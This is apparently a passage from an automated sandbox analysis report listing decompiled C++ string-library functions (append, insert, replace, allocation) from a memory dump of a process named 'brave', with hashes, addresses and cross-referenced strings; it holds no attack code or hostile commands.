Instruction ID: 65acdda8a8f2e048200974bcf8457e010a3ccdbaab1647a24b8cd9c4ced7a2ca
Opcode Fuzzy Hash: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction Fuzzy Hash: 1151D262A09F6180EB20AB15E8801B9B7A1EB4AFDCF4C4531DEDCA7756DE7CE542C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B48980 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B48980(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x52b489b2;
				r9d = 0;
				_t3 = E00007FF67FF652B46C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff652b48985
0x7ff652b48988
0x7ff652b48991
0x7ff652b4899c
0x7ff652b489a1
0x7ff652b489a4
0x7ff652b489a9
0x7ff652b489b1

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B489BC, 00007FF652B48A1A, 00007FF652B48A7A
basic_string::basic_string, xrefs: 00007FF652B489B5, 00007FF652B48A13, 00007FF652B48A73
basic_string::_S_construct null not valid, xrefs: 00007FF652B48B0A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction ID: ec0e948659f5743f7b0f11c0f578c6702592e320af76e30e6e95cb7d2578be05
Opcode Fuzzy Hash: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction Fuzzy Hash: 754139A2F16A4541FF109B61EC943BD6391AB66BCCF4C4431CE4CAB396EEACD581C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B48FA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B48FA0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x52b48fd2;
				r9d = 0;
				_t3 = E00007FF67FF652B46C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff652b48fa5
0x7ff652b48fa8
0x7ff652b48fb1
0x7ff652b48fbc
0x7ff652b48fc1
0x7ff652b48fc4
0x7ff652b48fc9
0x7ff652b48fd1

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B48FDC, 00007FF652B4903A, 00007FF652B4909A
basic_string::basic_string, xrefs: 00007FF652B48FD5, 00007FF652B49033, 00007FF652B49093
basic_string::_S_construct null not valid, xrefs: 00007FF652B4912A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction ID: 6c7851482aab95e6ac5dd9af6b0c599b8251f78177ea706e37f260654a3abfbc
Opcode Fuzzy Hash: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction Fuzzy Hash: 714129A1F16A4541FF109B61EC943BD63A1AB66BCCF4C4531CE4CAB386EEACD581C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4F340 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF652B4F340(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx >> 1 -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x52b4f36d;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF652B4DEF0(_t5, _t6, __rcx, __rdx -  *__rcx >> 1,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff652b4f358
0x7ff652b4f35a
0x7ff652b4f35f
0x7ff652b4f36c

APIs

wcslen.MSVCRT ref: 00007FF652B4F3A5

Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DF96
Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DFC1

Strings

basic_string::insert, xrefs: 00007FF652B4F4BC, 00007FF652B4F51C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4F37A, 00007FF652B4F3DD, 00007FF652B4F41F, 00007FF652B4F463, 00007FF652B4F4C3, 00007FF652B4F4DC, 00007FF652B4F523
basic_string::replace, xrefs: 00007FF652B4F373, 00007FF652B4F3D6, 00007FF652B4F418, 00007FF652B4F45C, 00007FF652B4F4D5

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 1844840824-3628603605
Opcode ID: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction ID: 7821e1f71c92a88c87287f8ac05340c3e498f2d92fb2dba82ec35da1d74f2963
Opcode Fuzzy Hash: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction Fuzzy Hash: 26412762F0598690EB44DB69DC404AD2311FB56BCCF884236DE8CA7751EEACE141CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4C170 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF652B4C170(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x52b4c19a;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF652B4AE20(_t5, _t6, __rcx, __rdx -  *__rcx,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff652b4c185
0x7ff652b4c187
0x7ff652b4c18c
0x7ff652b4c199

APIs

strlen.MSVCRT ref: 00007FF652B4C1D5

Part of subcall function 00007FF652B4AE20: memcpy.MSVCRT ref: 00007FF652B4AEC5
Part of subcall function 00007FF652B4AE20: memcpy.MSVCRT ref: 00007FF652B4AEF0

Strings

basic_string::replace, xrefs: 00007FF652B4C1A0, 00007FF652B4C206, 00007FF652B4C248, 00007FF652B4C28C, 00007FF652B4C307
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4C1A7, 00007FF652B4C20D, 00007FF652B4C24F, 00007FF652B4C293, 00007FF652B4C2F5, 00007FF652B4C30E, 00007FF652B4C353
basic_string::insert, xrefs: 00007FF652B4C2EE, 00007FF652B4C34C

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 2619041689-3628603605
Opcode ID: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction ID: fa97fdb8ec89974f952961e2580633f6b55d59e2a24c4a9ae485c1491f8e8157
Opcode Fuzzy Hash: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction Fuzzy Hash: AE411362F09A8681EB00DB66DC904A92361FB56FCCF884232ED8CB7711EEBCD541CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4EEA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF652B4EF05
memcpy.MSVCRT ref: 00007FF652B4EFDA

Strings

basic_string::append, xrefs: 00007FF652B4EF5D, 00007FF652B4F039
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4EF64

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction ID: 1ae11454afcd2913189951c8a1834dff765a1c40805773c3173907b34922ac31
Opcode Fuzzy Hash: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction Fuzzy Hash: F541E462B15A5590EA10DF59C8848BC2362FB56BCCF8C4232EE9DA3391DF7DE141C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4BCF0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF652B4BD55
memcpy.MSVCRT ref: 00007FF652B4BE27

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4BDB9
basic_string::append, xrefs: 00007FF652B4BDB2, 00007FF652B4BE7C

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction ID: cf9475c5cda57d34eff2266f478c24975b45edca107c8ab97333fc5c66298e76
Opcode Fuzzy Hash: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction Fuzzy Hash: 2D41E2A3F09A8981DA10DB29DC845792362EB87BCCF8C4531DF9DA7392EE6DD141C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B47CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B47CE0(intOrPtr* __r8, void* __r9, intOrPtr _a40) {
				void* _t8;
				void* _t22;
				intOrPtr* _t25;
				char* _t27;
				int _t28;
				int _t30;
				intOrPtr _t40;
				void* _t47;
				intOrPtr _t49;

				_t40 =  *((intOrPtr*)( *__r8 - 0x18));
				_t47 =  >  ? _a40 : _t40 - __r9;
				if (__r9 - _t40 > 0) goto 0x52b47d12;
				goto 0x52b47b40;
				_t27 = "basic_string::insert";
				_t25 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
				E00007FF67FF652B51250(_t8, __r9 - _t40, __r9, _t25, _t27, __r9,  *__r8 + __r9);
				_t49 =  *((intOrPtr*)( *_t25 - 0x18));
				if (_t27 - _t49 > 0) goto 0x52b47db0;
				if (__r9 - 0xfffffff9 - _t49 > 0) goto 0x52b47dc6;
				r8d = 0;
				E00007FF67FF652B48580(_t25, _t27, __r9, __r9);
				if (__r9 == 0) goto 0x52b47d8c;
				if (__r9 == 1) goto 0x52b47da0;
				return memset(_t22, _t30, _t28);
			}

0x7ff652b47cec
0x7ff652b47cfc
0x7ff652b47d03
0x7ff652b47d0d
0x7ff652b47d15
0x7ff652b47d1f
0x7ff652b47d26
0x7ff652b47d3f
0x7ff652b47d4f
0x7ff652b47d61
0x7ff652b47d66
0x7ff652b47d69
0x7ff652b47d71
0x7ff652b47d7e
0x7ff652b47d98

APIs

memset.MSVCRT ref: 00007FF652B47D87

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B47D1F, 00007FF652B47DB3
basic_string::_M_replace_aux, xrefs: 00007FF652B47DC6
basic_string::insert, xrefs: 00007FF652B47D15, 00007FF652B47DBA

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction ID: 0f39ca360e110c66e3c048c719f9daeaff9a27b7cde46069941382571136beae
Opcode Fuzzy Hash: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction Fuzzy Hash: C8312566F15A4641EA10DB16EC818E82351AB4ABECF8C4A31DF5CA73D1ED7CE981C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B50C80 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF652B50C92
memcpy.MSVCRT ref: 00007FF652B50CE4
memcpy.MSVCRT ref: 00007FF652B50D94

Strings

basic_string::append, xrefs: 00007FF652B50D3A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction ID: 64bb0e869cb81cb7d98450593548fd92311519841eb95c77de0528ca22688ff9
Opcode Fuzzy Hash: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction Fuzzy Hash: AB318E62B19A4580DA10DB15C8485BD3361FB5ABCCB9C8932EE5DAB3D0EFBDE445C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B518C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,FFFFFFFF,00007FF652B47139,?,?,FFFFFFFF,00007FF652B46BB5,?,00000000,basic_string::_M_create,00007FF652B4A151), ref: 00007FF652B518D4

Part of subcall function 00007FF652B519A0: malloc.MSVCRT(?,?,?,?,00007FF652B523B5,?,?,?,?,00007FF652B23C24), ref: 00007FF652B519B1

malloc.MSVCRT(?,?,?,?,?,?,?,00007FF652B47139,?,?,FFFFFFFF,00007FF652B46BB5,?,00000000,basic_string::_M_create,00007FF652B4A151), ref: 00007FF652B5193A

Strings

basic_string::_M_create, xrefs: 00007FF652B519A0

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID: basic_string::_M_create
API String ID: 2803490479-3122258987
Opcode ID: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction ID: be6760c63e93c45e25bb74a28c0578a263e3ca6fbc8ef57de00ad9f6bc7f1373
Opcode Fuzzy Hash: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction Fuzzy Hash: 8921C721B2674541FE58A764ED113B82291AF4A7ACF9C4634CF6D9A3C2FFBC6185C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4DC10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF652B4DC22
memcpy.MSVCRT ref: 00007FF652B4DC72
memcpy.MSVCRT ref: 00007FF652B4DD21

Strings

basic_string::append, xrefs: 00007FF652B4DCCD

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction ID: cba3ef46b353996c42a90b1c8620cf8a03adc7a92867ff2f31aefd84c3fbcc8d
Opcode Fuzzy Hash: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction Fuzzy Hash: 2331A763B0968780DA10CA15D8985793366EB47BDCF8C4532DEED97392DEACD541C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B48580 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF67FF652B48580(long long* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* _v73;
				void* _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				long long* _t25;
				long long _t37;
				intOrPtr _t38;
				long long _t45;

				_t23 =  *((intOrPtr*)(__rcx));
				_t38 =  *((intOrPtr*)(_t23 - 0x18));
				_t25 = __rcx;
				_t37 = __r9 - __r8 + _t38;
				if (_t37 -  *((intOrPtr*)(_t23 - 0x10)) > 0) goto 0x52b485cb;
				if ( *((intOrPtr*)(_t23 - 8)) <= 0) goto 0x52b48660;
				_t24 =  *((intOrPtr*)(__rcx));
				E00007FF67FF652B470D0(_t16, _t37,  *((intOrPtr*)(_t24 - 0x10)));
				if (__rdx == 0) goto 0x52b48600;
				_t8 = _t24 + 0x18; // 0x18
				_t45 = _t8;
				if (__rdx == 1) goto 0x52b486a0;
				memcpy(??, ??, ??);
				if (_t38 - __r8 + __rdx != 0) goto 0x52b48640;
				asm("lock xadd [ecx-0x8], eax");
				if (0xffffffff <= 0) goto 0x52b48690;
				 *_t25 = _t45;
				 *((intOrPtr*)(_t45 - 8)) = 0;
				 *((long long*)(_t45 - 0x18)) = _t37;
				 *((char*)(_t45 + _t37)) = 0;
				return 0xffffffff;
			}

0x7ff652b48590
0x7ff652b48593
0x7ff652b485a8
